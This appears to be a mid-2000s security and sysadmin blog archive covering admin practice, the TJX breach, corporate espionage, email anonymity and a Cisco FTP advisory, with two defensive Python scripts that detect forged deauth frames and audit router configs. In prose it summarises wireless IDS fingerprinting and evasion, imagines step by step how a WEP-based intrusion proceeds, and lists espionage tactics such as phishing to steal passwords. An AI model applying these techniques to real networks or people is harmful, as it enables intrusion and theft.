    Start the weekend off right with some off-topic reading pleasure. EW has a list of the top 25 moments in sci-fi in the past 25 years (and proper apologies for not being able to include Star Wars 1977 because it is too old). I definitely think I have a few television shows to watch as they appear on DVD. Excellent list!
    .: seven things sysadmins forget to do
    Lists by IT guys cum journalists can be pretty interesting things. Either they're obvious junk or sometimes just plain wrong. I eagerly checked out this link Marcin sent me about 7 things sysadmins forget to do, thinking it would be pretty stupid. I was pleasantly surprised with a few of the items. Here are some of my comments.

    1. Forgetting to Delete a Former User's Account - This is one of those obvious ones, but I will defend poor sysadmins like myself and say that we don't just willy-nilly disable user accounts, even if we hear gossip that someone left. Too often, account disabling is not a breakdown of sysadmins, but a breakdown in the process of notifying sysadmins that someone has left. I really hate hearing someone "left 3 weeks ago" through the grapevine. (Or conversely, that "I have someone starting tomorrow morning...") Maybe in huge environments things like identity management should be looked at to solve this issue, but in smaller or medium environments, I really think HR and IT just need to make sure there is a process for account notification that is followed. In the end, all the sysadmin lists and processes are naught if no one says so-and-so is gone.

    2. Forgetting to Regularly Search for Rootkits - Ok, this is just kind of a weird one. I don't think I've ever "forgotten" to search for a rootkit so much as I just don't look for them, or if a system is so obviously overrun it gets reformatted rather than spend more time on it.

    I think the author has good points about how to mitigate rootkits and detect them, but seriously, how many admins put forth that much effort? Rootkits are the Harry Potters of the corporate IT household. They want to be kept under the stairs or up in their room and ignored and not dealt with...and for good reason. It is almost like having mice in your building. You can put out some traps, but really, no one is going to bother much with tearing up the walls trying to find their homes.

    I sound kinda defeatist here, but the effort to find and protect against rootkits is a big investment, really. I just think this isn't so much forgotten as it is just chosen not to be done.

    3. Forgetting to Use a Trouble Ticket Tracking System - Here's a personal bit about me: I'm a stickler about documentation and the sharing of information. There is too often a HUGE amount of organizational knowledge that leaves when an IT worker leaves a position. That shouldn't be the case; they should keep things documented for someone else to reference.

    A trouble ticket system is part of that. If I know I've worked on something before, I want to be able to search the tickets and see what remediation occurred previously. I think some of this comes from my science background, where experiments have to be documented such that someone else can recreate your findings. That's a big part of what a ticket system is to me.

    Not only that, but it can be used to audit changes and requests. If Sally requested file server permission changes and was authorized to do so, but made a stupid request that caused data loss, that can be traced back to her ticket and the information in it. I also feel that, as a heavily-worked IT guy (and later on in my career, likely a manager of some sort), the ticket system is a natural means to track work loads and inefficiencies and reduce forgetfulness. Unless a ticket system has no means for internal notes (things not sent back to the requester) I really hate, hate, HATE to see tickets answered with, "Done," and absolutely no details on what was done...

    There is one caveat to this, however, and would be Needy Users who have Stupid Questions but they insist on asking in person or calling in about them when their deadline is 1 hour away. Often, it might not be sysadmins who forget to use the ticket system, but users who bypass the ticket system to saddle IT with work requests. Sysadmins are then left to hopefully remember to put in the ticket themselves.

    4. Forgetting to Set Up Technical Documentation and Creating a Knowledge Base - Based on my notes above, it's pretty obvious this is a sticking point with me as well. I deeply believe in the need for clear, effective documentation and maybe even a knowledge base. This should occur in IT shops of 1 person or 1,000 people. Even if I don't plan on leaving a job, there are always systems and processes that occur every 6 months or longer, and I hate to get to those points and not remember what to do. Referencing documentation helps speed up memory, gets the tasks done efficiently, and improves consistency by not forgetting steps or retracing old mistakes. This can even be part of a DR/BCP or backup strategy, where network diagrams, IP distributions, config files, and other settings are documented somewhere for use in continuing the business in the case of large or small issues.

    5. Forgetting the Risks of Flash Memory Drives - This also falls into "I didn't forget it, we just don't do this" category. By now, I really think everyone knows the issues with USB drives. They can introduce things not wanted and are a vehicle for data egress. You'll notice the author gives not even a single sentence on how to address this or what approach could be taken. There's likely a reason for that. Many people either don't know how to manage USB devices (do you know how to stop USB drives but allow USB mice/keyboards?) or can't get senior management to back the blocking of ports. Ever try to block USB/Firewire ports and have all the ipod users mutiny? Ever try to justify buying a certain USB brand for "official" use and tell people their personal ones won't work? This isn't so much forgotten as it is just not a battle to be fought or teams lack the knowledge to truly tackle it. There are far easier fires for most sysadmins to fight right now. The coming years should hopefully make tools to do these things easier for us admins, but they won't be getting cheaper or easier on the workforce at large, unfortunately.

    Of note, for anyone who wants to limit USB drives, did you also limit floppy drives back in the day? Do you limit CD drives now? What is your basis for managing those differently? Honestly, USB drives can be argued to simply be part of our culture now, just like cell phones and the compact disc. Just be aware of that when trying to limit them and how that might affect employee happiness aka productivity, especially if your business is not subject to stringent regulations about tracking data egress.

    6. Forgetting to Manage Partial Root Access - I don't really have anything to say here.

    7. Forgetting Courtesy - This is a mixed bag with me. I agree, courtesy needs to be extended in a company, not just from IT, but from everyone. Each company is really just one big team trying to work together to do Great Things, but too often that courtesy breaks down somewhere, and that little ghost of rudeness gets passed around like a flatulence cloud that hovers and moves unexpectedly.

    Yes, some IT guys are just rude and give evil looks when asked to assist with something. But I've often seen and felt that some of that rudeness is not something IT guys inherently do, but have been trained to do by poor management or abusive users. How many IT guys have tried to do the right thing by helping people, only to get sucked into tasks that aren't their responsibility just because they happened to make eye contact at the wrong time or try to help someone else?

    At my last job, we had an HR director who needed regular help with her computer. I gladly stepped up and enthusiastically helped her early on. But she was one of those people who cannot be satisfactorily helped unless you do her job for her. Sadly, I couldn't do that, and some of the things she wanted were simply not even possible. She became the "oh god, don't help her, don't get involved because you can't win! Even if you win, she'll eventually get you to do things that you just can't do and then you're in the shitter!" IT support nightmares. In fact, I think every IT guy at that company who has tried has either left that company or is still in the shitter with her (and being in HR, you know what that means...). (Hell, I even got in trouble once because she asked me to rewire an electrical outlet and I said that needed to be done by a qualified outside contractor that the CFO would set up...)

    Too often I really think IT guys are conditioned to be evil eye guys and this is as much a reflection on the corporate culture and their managers as it may be their inherent personality. Some people are assholes, but a lot of us are not.

    (By the way, a lot of us IT guys have a ton of things to think about as we walk the halls to get from one place to another; we're often thinking about some problem or improvement, so if you stop us in the middle of the hall with some Stupid User Question and get a queer look, that just might be us trying to switch into help mode or tie off our internal thoughts to properly come back to them later. Or we know that Needy User has just circumvented the aforementioned ticket system by asking us in person, and will give us his own Evil Look when we plead that he make a ticket request since we're currently in the middle of something for More Important Needy User...it's a no win situation for us sometimes.)
    .: evading and detecting wireless ids systems
    David Maynor recently caught some attention by being critical of how Airtight protects a wireless network from rogue APs (and clients). I'll let the link speak for itself on that, as well as the Airtight CTO's take in the comments section of a post on Andrew Hay's site (and Mike Rothman's for that matter).

    What I found even more intriguing was the link to a 2005 paper from Joshua Wright discussing the flaws and details in wireless IDS/IPS methods of containing rogue wireless clients. Joshua Wright has an amazing ability in his papers to write very clearly and plainly, making the information easy to follow, and while the paper comes in only at 17 pages, I thought I would paraphrase his key points a bit in this post.

    • Wireless IDS detect and then try to disassociate/deauthenticate (deauth from here on) rogue clients.
    • Some try to send deauth frames to the clients, some also to the appropriate access point.
    • Some just vomit out deauth frames, others are more timed to respond efficiently.
    • The deauth mechanism is not set in stone, meaning implementation of frames can be done many ways. This combined with the various features means an attacker can detect and fingerprint a wireless IDS to better attack/evade it.
    • Detection/fingerprinting can be done via sequence number anomalies in the frames. Some vendors have set sequence numbers. Sometimes sequence numbers can be noticed as different between the wireless IDS frames and the real AP frames.
    • Detection/fingerprinting can be done via disconnect notice bit anomalies.
    • Detection/fingerprinting can be done by watching access point traffic in relation to deauth frames. If an AP really did issue a deauth, it wouldn't overlap that with assoc or other frames. If an IDS did the deauth, the AP's frames may overlap, giving away the IDS.
    • Detection can be done by comparing the signal strength bits of deauth and normal frames. Deauths of a different signal strength can give away the IDS presence.
    • An attacker can sometimes slip data into a network by slipping in between deauths that are spaced too far apart. Some vendors allow this to be variable or simply leave more time in between deauths so as not to further saturate the wireless media.
    • An attacker can modify his wireless drivers to ignore deauth frames such that if an IDS only sends deauths to the client and not the AP, the connection is never torn down because the client takes no action.

    Check the paper for more details, including patching madwifi drivers to ignore deauths.
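    The sequence-number and signal-strength tells above cut both ways: the same anomalies that let someone fingerprint a wireless IDS let a defender spot deauth/disassoc frames that were forged on the AP's behalf (a deauth flood, or a containment device you didn't deploy). The script below is an added example, not code from Wright's paper or from this post; it runs the three checks over a constructed list of frame records. In a real deployment the records would be filled from a monitor-mode capture; the tolerances (SEQ_TOLERANCE, RSSI_TOLERANCE_DB, FLOOD_THRESHOLD) are assumptions to tune per site, not values from the paper.

```python
"""Flag disconnect frames that do not look like the AP's own (added example)."""
from collections import defaultdict, deque

SEQ_MODULUS = 4096          # 802.11 sequence numbers are 12 bits and wrap
SEQ_TOLERANCE = 20          # assumed: largest plausible gap between an AP's consecutive frames
RSSI_TOLERANCE_DB = 15      # assumed: a deauth this far from the AP's usual level is suspect
FLOOD_THRESHOLD = 5         # assumed: this many disconnects from one BSSID inside the window
FLOOD_WINDOW_S = 1.0
DISCONNECT_TYPES = {"deauth", "disassoc"}


def seq_gap(later, earlier):
    """Forward distance from earlier to later on the wrapping 12-bit counter."""
    return (later - earlier) % SEQ_MODULUS


def analyze(frames):
    """Return a list of alert tuples; the first element of each is the alert kind."""
    last_seq = {}                                  # BSSID -> seq of its last normal frame
    rssi_hist = defaultdict(lambda: deque(maxlen=8))  # BSSID -> recent RSSI of normal frames
    recent_disc = defaultdict(deque)               # BSSID -> timestamps of recent disconnects
    alerts = []
    for f in frames:
        src, seq, kind, ts, rssi = f["src"], f["seq"], f["type"], f["ts"], f["rssi"]
        if kind not in DISCONNECT_TYPES:
            # Only the AP's own traffic anchors its sequence counter and RSSI baseline;
            # disconnect frames are never trusted to update either.
            last_seq[src] = seq
            rssi_hist[src].append(rssi)
            continue
        prev = last_seq.get(src)
        if prev is not None and seq_gap(seq, prev) > SEQ_TOLERANCE:
            alerts.append(("seq_anomaly", ts, src, seq, prev))
        if rssi_hist[src]:
            baseline = sum(rssi_hist[src]) / len(rssi_hist[src])
            if abs(rssi - baseline) > RSSI_TOLERANCE_DB:
                alerts.append(("rssi_anomaly", ts, src, rssi, round(baseline, 1)))
        q = recent_disc[src]
        q.append(ts)
        while q and ts - q[0] > FLOOD_WINDOW_S:
            q.popleft()
        if len(q) >= FLOOD_THRESHOLD:
            alerts.append(("disconnect_flood", ts, src, len(q)))
    return alerts


def summarize(alerts):
    """Count alerts by kind."""
    counts = defaultdict(int)
    for a in alerts:
        counts[a[0]] += 1
    return dict(counts)


# Constructed capture: a few genuine AP frames (including one real deauth in
# sequence at the usual signal level) followed by five forged deauths that
# reuse a fixed sequence number and arrive at a different signal level.
AP = "00:11:22:33:44:55"   # placeholder BSSID
FRAMES = [
    {"ts": 0.00, "src": AP, "type": "beacon", "seq": 100, "rssi": -45},
    {"ts": 0.10, "src": AP, "type": "beacon", "seq": 101, "rssi": -46},
    {"ts": 0.20, "src": AP, "type": "data",   "seq": 102, "rssi": -44},
    {"ts": 0.25, "src": AP, "type": "deauth", "seq": 103, "rssi": -45},
    {"ts": 0.30, "src": AP, "type": "beacon", "seq": 104, "rssi": -45},
    {"ts": 0.31, "src": AP, "type": "deauth", "seq": 3000, "rssi": -70},
    {"ts": 0.32, "src": AP, "type": "deauth", "seq": 3000, "rssi": -71},
    {"ts": 0.33, "src": AP, "type": "deauth", "seq": 3000, "rssi": -69},
    {"ts": 0.34, "src": AP, "type": "deauth", "seq": 3000, "rssi": -70},
    {"ts": 0.35, "src": AP, "type": "deauth", "seq": 3000, "rssi": -72},
]

if __name__ == "__main__":
    for alert in analyze(FRAMES):
        print(alert)
    print(summarize(analyze(FRAMES)))
```

    The genuine deauth at seq 103 passes all three checks; each forged frame trips the sequence and RSSI checks, and the flood counter fires once the fifth disconnect lands inside the one-second window. A vendor that uses a fixed sequence number for its containment frames will show up as a long run of identical seq_anomaly alerts.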
    .: tjx breach instigated through insecure wireless
    It sounds like someone traced the TJX breach back to a store in Minnesota that employed WEP as their only(?) protection for their wireless system. While this is a simplistic announcement, it certainly is not the whole story.

    This illustrates how just one weak part of a huge network (or business) like TJX can bring the whole thing down. You can roll out secured (?) wireless to 1,000 stores, but it just takes one store whose manager doesn't quite understand the technology (should they really, though?) or one overlooked site by the techs doing the setup and you suddenly become a part of security and business history.

    I also wonder where the layered protections were. Did this Minnesota store get automatically bridged into the corporate network that had access to all this sensitive data whizzing by? Did no one have any logs or tripwires up on anything to monitor access? How well did the attackers cloak themselves to look like innocuous or expected systems? Was anyone watching the wireless access logs, or anomalies in data collection/transfer that most probably occurred?

    I see that the article mentions software patching was lax. I see that employee logins were sniffed (NTLM or clear text to proprietary system?). Sadly, for as much as we need details to improve security both at TJX and with PCI auditors (and the rest of us!), this is so costly that I doubt we hear more details for years until the courts release it. Did they ever rotate wireless passphrases? What was the real need for wireless in the first place?

    So let's say I'm in Minnesota and see a Marshall's using WEP on their wireless network. I crack WEP and do some testing and practice some patience to make sure no one's watching the access and that I don't trip any IDS. Eventually I get comfortable enough to log onto the network and perform some stealth scans to see what I can see. I bet I can see a lot, including some unpatched machines which I can get a foothold into (in a best case scenario for me, I might just be right on the full corporate network through some dedicated VPN setup). This pretty much shows me that admins at TJX aren't quite as diligent as they should be, which can put me and my cohorts at ease. From there, I can sniff on systems I own and pilfer what I can. Lack of software patching standards probably mean shared passwords everywhere too.

    Blah blah blah...there's plenty of places where TJX should have detected and or slowed down these attackers. Death by a 1000 cuts is becoming a pet phrase of mine...
    .: corporate cyber espionage is still in its infancy
    A good friend of mine and I were talking this weekend and the topic came up of corporate (and beyond) cyber espionage only just starting to be a force. I really believe that as more and more people have insecurity skills and our society continues to become more digitally dependent on information as our lifeblood in business, corporate espionage (which really has always been around) will only become more and more prevalent.

    I wonder how many corporations (truly!) think it would be moral/immoral to:

    1) Do some cyber "recon" at tradeshows on your competitors. Or maybe just DoS them during their demos? (active and passive attacks)

    2) Hire some group to perform a DoS against a competitor's website/service during a particularly important moment.

    3) Perform recon to continually footprint and find systems and sensitive information. Do you know how often a company can give away new projects just by their public DNS entries?

    4) Perform dumpster diving regularly?

    5) Feel ok with profiling and possibly probing employees' home networks (particularly wireless)? Think c-levels and remote sales, for starters.

    6) Send malicious emails to targeted persons in a rival company hoping to root the system? Do you know how quickly someone running as local admin can have a malicious program installed which can then sniff and or grab email account passwords for very important people and then send it back to someone who can log into webmail whenever they want?

    7) Try to guess some webmail passwords of important people?

    8) Pay for someone who has information about a rival because this person just sits at major airports and attempts wireless attacks against travelers, looking for juicy connections and info to sell?

    I really think this is only going to get worse and much more commonplace. Besides, much of this stuff is still way too easy to perform, and in a way that is still way too anonymous. And I think anyone who has been online any amount of time knows that laws are more "easily" broken when you're not standing in front of a police officer. Physical presence is a barrier that most often protects our physical safety, but that deterrent is completely absent online.
    .: the sysadmin ultimately exists to support the business
    In response to the 7 things sysadmins forget, Rebecca Herold commented and I wanted to pull it out for a separate post.
    Forgetting that their sys admin job ultimately exists to support the business
    No kidding! I think there are three mindsets when it comes to sysadmins (and really, IT/business in general).

    1. Sysadmins who understand this concept and make decisions themselves on how their job relates to the business.

    I consider these sysadmins to be empowered admins who understand their job. They can prioritize their time and make decisions frequently on their own that really do benefit the company and their own role. The sysadmin with this mindset tends to perform risk assessment and decision-making in her head and can sometimes be seen as making rash (but hopefully accurate) decisions.

    2. Sysadmins who don't care about this question and instead defer this layer of involvement in the business to their boss.

    Sysadmins at this stage seem to need lots of things escalated to their manager, even when small ticket requests have slightly larger implications. They do their job well, give a nice point to their manager on their views, but ultimately let someone else make a decision for them. Some sysadmins may get forced into this position based on the company and managers they interact with. When bureaucracy does not exist, this may be a result of lack of respect and trust given to the sysadmin such that he is not allowed to make his own decisions. Other times, this is just the style the business prefers.

    3. Sysadmins who forget this all the time and really think the business exists to serve their job, or better yet, they only see their job as being ultimately important.

    These sysadmins are typified by saying "secure this, secure that," even if it impacts business negatively. They make decisions based on their job only. Sometimes this is good, especially in a large corporation where you only really have a small slice to make decisions around anyway, but typically this is a negative mindset where the admin is likely never feeling fulfilled and really never fully gets his way...ever.

    I think it would be beneficial to see which sysadmin one is, and what sysadmin the company nurtures. Even something as simple as me being a #2 sysadmin but in a #1 company can lead to unhappiness and underperformance. For instance, I like making decisions quickly on my own about what security and IT initiatives to do and how to do them, but if I am in a company where my boss and other managers hate that, I likely won't be very effective and we might all end up turning into sourpusses over time.
    .: on not being you
    So, we have an intarweb that lets us post all sorts of zany things all over the place, from a ratty MySpace page to a litany of comments on news clippings and blogs and forums.

    I know Dan Morrill talks now and then about making sure an employer Googles prospective employees. But what if someone has been posting using your name in various places? For instance, I make little to no effort to mask my online moniker, LonerVamp. But what if someone started using that name maliciously and posting hate and other garbage around that eventually gets indexed?
    .: web 2.0 animation
    I saw this a few months ago and can't remember where I saw it. But I looked it up again and to save me from the trouble of losing it in the future, I'm posting this web 2.0 clip, The Machine is Us/ing Us.
    .: bruce on not needing a security industry
    I've seen plenty about what Bruce Schneier said recently along with the feedback. Rather than address the content directly, I just want to say that eventually, many experts become nearly an establishment in themselves. Eventually they can say big, extreme things, and rather than be pissed away like some angry kid, they instead influence. Or at least make a valid point in their extreme. They kinda become those half-senile curmudgeons that are important enough that people listen to everything they say. He can say big things and doesn't mind if everyone else uses his words as a boilerplate.

    Now, that's not a criticism. I don't think that is bad at all. But I think that when a lot of people my age get to be Bruce's age with a similar long background in this field, we might also see new things or futility in old things and say stuff that might be seen by others as a bit far-fetched. But I think his extreme approach is just a direct relationship to his notoriety and influence.

    For some reason, I really wanted to work a quote in here as my mind drifted from establishment to institution. Anyway, I'll force the quote in anyway, "No, I want you to set a fire so goddamn big the gods will notice us again, that's what I'm saying. I want all you boys to look me straight in the eye one more time and say, 'Are we having fun or what?'"
    .: web app sec testing sites
    Saw this on the SecurityFocus pen-testers mailing list and thought I would capture them here for future reference. These are some sites/tools to help evaluate web app security scanner tools.

    SPI Dynamics zero.webappsecurity.com
    Cenzic crackme.cenzic.com
    Foundstone SASS tools
    OWASP WebGoat
    OWASP SiteGenerator
    Watchfire demo site
    Acunetix php test site

    Typically, lots of the online "hack me" or "hacker challenge" sites like some in my right menu list tend to touch on web-borne "hacks" for their challenges as opposed to anything else. May get some mileage from them as well. Most also can be Googled for solutions should you get stuck and want to just learn quickly.
    .: staying anonymous - part 3 email
    email (mailing lists) - Email is an important validator of people versus bots. It is also an excellent means to communicate with others and peruse email mailing lists which have some of the most traffic and information sharing of any method presented. However, you certainly do not want to use your own mail address from work, home, school, or even your own home server if you want to preserve your anonymity. Sign up for Google's Gmail and create an anonymous account.

    Do not set up POP3/SMTP on your normal mail client and instead stick solely to the web interface using a non-IE browser that is diligently patched. Using your own client may tempt you to reply, and not every email service is necessarily anonymous when you send your email directly from a client application.

    Don't send your "real" email accounts mail from this anonymous one; don't send yourself test emails; don't forward away from this email. Instead, copy-n-paste or test your anonymity using another anonymous mail source that allows you to view full headers. Hotmail, Yahoo, and Hushmail are other choices, although the latter either requires money or it will lock your account if you don't log in for 3 weeks. If someone gets into your super secret email account, you don't want your Sent items to give you away (and vice versa if you lose control of your personal account).

    For some mailing lists, such as SecurityFocus, you can post replies via a web form (depending on the moderation of the list, you might have to at least provide a valid "on-the-list-already" email address). But at least this way you can check your mailing list anywhere, and always post under one address, or through a web proxy to hide your originating IP.

    I also highly recommend finding a favorite throw-away email box. Pookmail is my preferred disposable (yes, I'm dropping Google search terms!) email service. You send an email with a reply address or somethingunique@pookmail.com, wait for a reply and pick it up at the website. Granted, this has zero expectation of privacy, but at least you can use this as a throw-away address. I use this when signing up for software trials and downloads and junk that require a valid email.
    .: powershell: working with file permissions
    For my Powershell moment today, I have been working with setting file permissions. I had a problem trying to get permissions changes made to one folder to propagate down to all child items. I didn't really want to wipe out anything below, and I wasn't using any SDDL creation/twiddling approaches this time. Just a simple AddAccessRule that needed to be pushed down to all subfolders and files and still be marked as inherited.

    I finally found a solution by pulling the ACL from each child item, doing a SetAccessRuleProtection($false,$true) and then setting the ACL back onto the child item. This basically seems to force the ACL to be refreshed, which then pulls down stuff that should be inherited.
    # $strTarget is the folder whose new access rule should flow down to every child item.
    foreach ($i in Get-ChildItem $strTarget -Recurse -Force)
       {
          # Pull the child's current ACL, re-enable inheritance from its parent
          # (isProtected = $false, preserveInheritance = $true), and write it back,
          # which makes the child pick up the parent's inheritable rules.
          $objNewACL = Get-Acl $i.FullName
          $objNewACL.SetAccessRuleProtection($false, $true)
          Set-Acl $i.FullName -AclObject $objNewACL
       }
    .: truth and wisdom with age
    I speak truth, not so much as I would, but as much as I dare; and I dare a little the more, as I grow older. -Michel de Montaigne.

    If you've ever visited my personal site, you probably picked up that I collect and love meaningful quotes (the more zen the better!). This one came up today and reminds me of Bruce's little speech in recent weeks.
    .: metasploit tutorials
    Just for reference, a question about where to go for tutorials on Metasploit was recently posted to the pen-test mailing list on SecurityFocus. Here are some of the responses. At some point I need to explore this silc channel...

    Metasploit (wiki)Book
    Offensive Security 101
    Metasploit Toolkit (Syngress)
    milw0rm videos
    IronGeek video
    Tyler's videos
    .: mcgrew security bbs
    I've not hidden my support for the forum (or BBS) format of information exchange; in fact, I think it is one of the best formats when actively used. While I may not participate, I figured I would help post around about a new forum that is trying things out: McGrew Security BBS. We'll see where this goes and if I find the time to participate, as it is that first year that is the most important (and hardest) for any forum to endure; kinda like trying to siphon water. You have to work at it until it becomes more or less a self-sustaining conduit of incoming content and people.
    .: vmware server on ubuntu 6.10
    Tonight I finally got around to installing vmware server on my new vmware box. I used a couple sites as my guides. Ever since starting Linux, I've learned to keep "journals" about what I've installed and the voodoo needed to get some things working for future reference. I'm getting better about putting my notes down into a more polished form early, but I still might get one or two things wrong here. I'll try to update as needed, but I suspect eventually these notes will just get ported over to the wiki.

    I needed to install a few dependencies first since this is a fresh Ubuntu 6.10 install.
    sudo apt-get install xinetd
    sudo apt-get install linux-headers-`uname -r` build-essential
    this folder will be used to hold the vms:
    mkdir /var/vm
    Download both files (server and management user interface) into a temp folder and get a registration key while on the site. This is free and doesn't require any valid information, not even email. The key will appear after submitting the form (the sales teams must love that!).
    tar xvfz VMware-server-*.tar.gz
    cd vmware-server-distrib
    sudo ./vmware-install.pl
    I answer /var/vm as the location for virtual machines. I also answer "no" for NAT or host-only networking (leaving me with bridged mode) as I really just want my VMs to be grabbing an IP off my network and have full access out to the Internet (at least on this machine).

    Next is the MUI.
    tar xvfz VMware-mui-*.tar.gz
    cd vmware-mui-distrib
    sudo ./vmware-install.pl
    All defaults for the MUI. This should fail to start the httpd server at the end and needs a patch.
    cd /tmp
    wget http://users.piuha.net/martti/comp/ubuntu/httpd.vmware.diff
    cd /
    sudo patch -b -p0 < /tmp/httpd.vmware.diff
    sudo /etc/init.d/httpd.vmware start
    This is the location once it has started: https://localhost:8333.

    To create a VM, you will need to use the console (not the MUI) by heading over to Applications->System Tools->VMWare Server Console in the kicker.
    .: cisco ftp server vulnerability
    An article about a Cisco FTP vulnerability caught my eye today. The article gave little detail, so I checked with Secunia and sure enough saw an advisory. That's an interesting vulnerability (impacting, but not enabled by default...so not the holy grail of network hacking), and I would hope good admins have taken some measures to already mitigate or avoid this issue.

    First, don't use the FTP server. I'd rather use an external TFTP server as opposed to one on the router itself. Second, even if the config is disclosed, limit the damage by making sure your enable and enable secret passwords are different, as are the SNMP strings and other access passwords that may be disclosed in the config. Also make sure they're all different across other routers (minus the SNMP string of course). Third, update your IOS, of course, and hope that Cisco puts in a (long overdue) SCP/SFTP solution sooner than later.
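    The three mitigations above are easy to state and easy to let drift across a fleet of routers, so here is a small audit script that checks them against saved configs. It is an added example, not from Cisco or from this post. The configs are constructed, the enable secret hashes are placeholders, and the finding codes are this script's own; the commands it looks for (ftp-server enable, enable password, enable secret, snmp-server community) are real IOS syntax. Following the post, SNMP strings are expected to match across routers and are not flagged for reuse, but an identical enable secret hash on two devices is.

```python
"""Audit IOS-style configs for the exposures listed in the post (added example)."""
import re
from collections import defaultdict

HOSTNAME_RE = re.compile(r"^\s*hostname (\S+)", re.M)
FTP_RE = re.compile(r"^\s*ftp-server enable\s*$", re.M)          # "no ftp-server enable" does not match
ENABLE_PASSWORD_RE = re.compile(r"^\s*enable password(?: (\d+))? (\S+)\s*$", re.M)
ENABLE_SECRET_RE = re.compile(r"^\s*enable secret (\d+) (\S+)\s*$", re.M)
SNMP_RE = re.compile(r"^\s*snmp-server community (\S+)(?: (RO|RW))?", re.M)
DEFAULT_COMMUNITIES = {"public", "private"}


def audit_config(text):
    """Return (hostname, [(code, detail), ...]) for a single device config."""
    m = HOSTNAME_RE.search(text)
    host = m.group(1) if m else "unknown"
    findings = []
    if FTP_RE.search(text):
        findings.append(("FTP_SERVER_ENABLED",
                         "on-box FTP server is on; serve files from an external host instead"))
    for m in ENABLE_PASSWORD_RE.finditer(text):
        ptype = m.group(1) or "0"   # type 0 is cleartext, type 7 is trivially reversible
        findings.append(("ENABLE_PASSWORD_SET",
                         f"type {ptype} enable password is recoverable from a disclosed config; "
                         "keep it different from the enable secret or remove it"))
    for m in SNMP_RE.finditer(text):
        community, mode = m.group(1), m.group(2) or "RO"
        if community in DEFAULT_COMMUNITIES:
            findings.append(("SNMP_DEFAULT_COMMUNITY", f"{community} ({mode})"))
        if mode == "RW":
            findings.append(("SNMP_RW_COMMUNITY", f"{community} grants write access if disclosed"))
    return host, findings


def audit_fleet(configs):
    """Audit each config and add cross-device findings; returns {host: findings}."""
    report = {}
    secret_hosts = defaultdict(list)   # enable secret hash -> hosts using it
    for text in configs:
        host, findings = audit_config(text)
        report[host] = findings
        m = ENABLE_SECRET_RE.search(text)
        if m:
            secret_hosts[m.group(2)].append(host)
        else:
            findings.append(("NO_ENABLE_SECRET", "privileged mode has no enable secret"))
    for hosts in secret_hosts.values():
        if len(hosts) > 1:
            for h in hosts:
                others = ", ".join(o for o in hosts if o != h)
                report[h].append(("ENABLE_SECRET_SHARED", f"same enable secret hash as {others}"))
    return report


# Constructed sample configs; hashes are placeholders, not real digests.
RTR1 = """\
hostname rtr-branch-1
enable secret 5 $1$PLACEHOLDER$notARealHashAAAAAAAAAA
enable password 7 094F471A1A0A
ftp-server enable
snmp-server community public RO
snmp-server community s3cret-rw RW
"""
RTR2 = """\
hostname rtr-branch-2
enable secret 5 $1$PLACEHOLDER$notARealHashAAAAAAAAAA
no ftp-server enable
snmp-server community public RO
snmp-server community s3cret-rw RW
"""
RTR3 = """\
hostname rtr-branch-3
enable secret 5 $1$OTHERSALT$notARealHashBBBBBBBBBBB
snmp-server community branch-ro-string RO
"""

if __name__ == "__main__":
    for host, findings in audit_fleet([RTR1, RTR2, RTR3]).items():
        print(host, "clean" if not findings else "")
        for code, detail in findings:
            print(f"  {code}: {detail}")
```

    Whether the cleartext enable password equals the enable secret cannot be read straight from a hashed config line, so the script flags the mere presence of an enable password: once the config is disclosed it is the weaker of the two and is the one that should go.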

    Of additional note, I'm still itching to get my hands on the Hacking Exposed: Cisco Networks book. It taunts me weekly from the bookstore shelf, but I just don't want to get too confused as I am hitting the running strides of my study for CCNA (which I will take in late May or early June).
    .: conquer the ubuntu vnc black scrollbars
    If you do much work using Ubuntu and multiple computers, you may have noticed when using vncviewer to remotely connect to a system with a higher screen resolution, you'll get these annoying black scrollbars. These bars seem to only scroll in one direction and then never scroll again, right?

    Well, wrong. Turns out these bars do work, you just have to right-click to move the bars the other direction. Middle mouse button will work them in either direction. That's just weird and I'd rather not deal with it.

    There is another solution. On your client system, go to your repositories or otherwise apt-get xvnc4viewer. This will fix those dang scrollbars. As a bonus, this seems to replace any vncviewer apps you have on the Ubuntu client. If you type vncviewer, you get xvnc4viewer. If you click Applications->Internet->Terminal Server Client and attempt a VNC connection here, you also get xvnc4server. Nice!
    .: turn firefox into spyware
    Turn Firefox into spyware! I saw Xavier Ashe post about FFsniFF which is an extension for Firefox. It will not display itself in the extensions list, wait for HTML forms to be submitted, and email the contents of that submitted form to some email address. On one hand this makes me say, "What the crap...?" On the other, I could pilfer info from a lot of people who otherwise trust Firefox as their browser. While I might need admin rights to install keyloggers, I wonder if I could install this extension as a normal user? I guess this might not be a huge deal as there are browser password managers galore anyway, and they have to get those passwords somehow, but FFsniFF still seems very shady...
    .: on the total failure of information security
    Just about a year ago Noam Eppel released a paper that got posted pretty much everywhere and got lots of people in the security ranks talking. The paper was titled Security Absurdity: The Complete, Unquestionable, and Total Failure of Information Security. If that title didn't smack of an extremist and very dramatic "I'm not here to listen to rebuttals" tone, then I don't know what would.

    I held my comments, and instead wanted to hear Noam's follow-up article on what can be done to fix this. I really felt the first article was simply a dramatic flailing of arms and statistics on how everything is wrong; a device to get people all up in a lather and frothing at the mouth by saying something obvious and ignoring any real forward movement. I could make claims like, "Racism is bad, yeah, let's all get violently upset that racism is bad!" and keep fanning those flames without actually doing anything to combat racism. Lots of Feel Good, not a lot of Forward Movement.

    Noam promised in that article he would collect responses and combine those responses with a follow-up article on how to solve the issues. Under the header, "How can we fix this?" he offers, "Part Two of this article will contain a list of what we must do to address our current failure. It will incorporate your comments and feedback." Honestly, this sounded half like he was going to use other people's suggestions to formulate his own; shady.

    Sadly, the follow-up I had hoped for was not to be.

    Instead, Noam's follow-up consisted of some "Yay, people agree with me!" at the start, and then dogged down into the mud to simply argue at people who offered up some skepticism or disagreement with him. Basically, rather than fostering discussion, he quelled it by attacking the discussion to defend his vague position. He also offered no suggestions or solutions beyond a few weak moments in the first paper (2 factor authentication for gmail and hotmail...). This whole exercise seemed very self-serving and kinda like a cathartic rant session (not that we don't all have those, but maybe not quite so useless and attention-pleading).

    I am overall disappointed with this approach. I don't argue that the general feeling of Noam's article is wrong. I think we do have problems and issues, although I'm not sure we have a total failure. I had much more to say about the article, but I don't feel it worthwhile so will just let this little anniversary end with the bullet form of what some of my points would have been:

    1) You can't use stats to measure something that is as a whole growing; you have to wait for a plateau to get meaningful stats, or perhaps ratios.

    2) Noam's expectations may not be reasonable as he implies that people should feel safe doing "normal and common" stuff online. Kinda like I should feel safe walking around a really bad neighborhood with $100 bills sticking out of my pockets? I wonder what reality Noam is envisioning in regards to information security utopias? We need to define this better if we have any hope of moving arbitrarily forward.

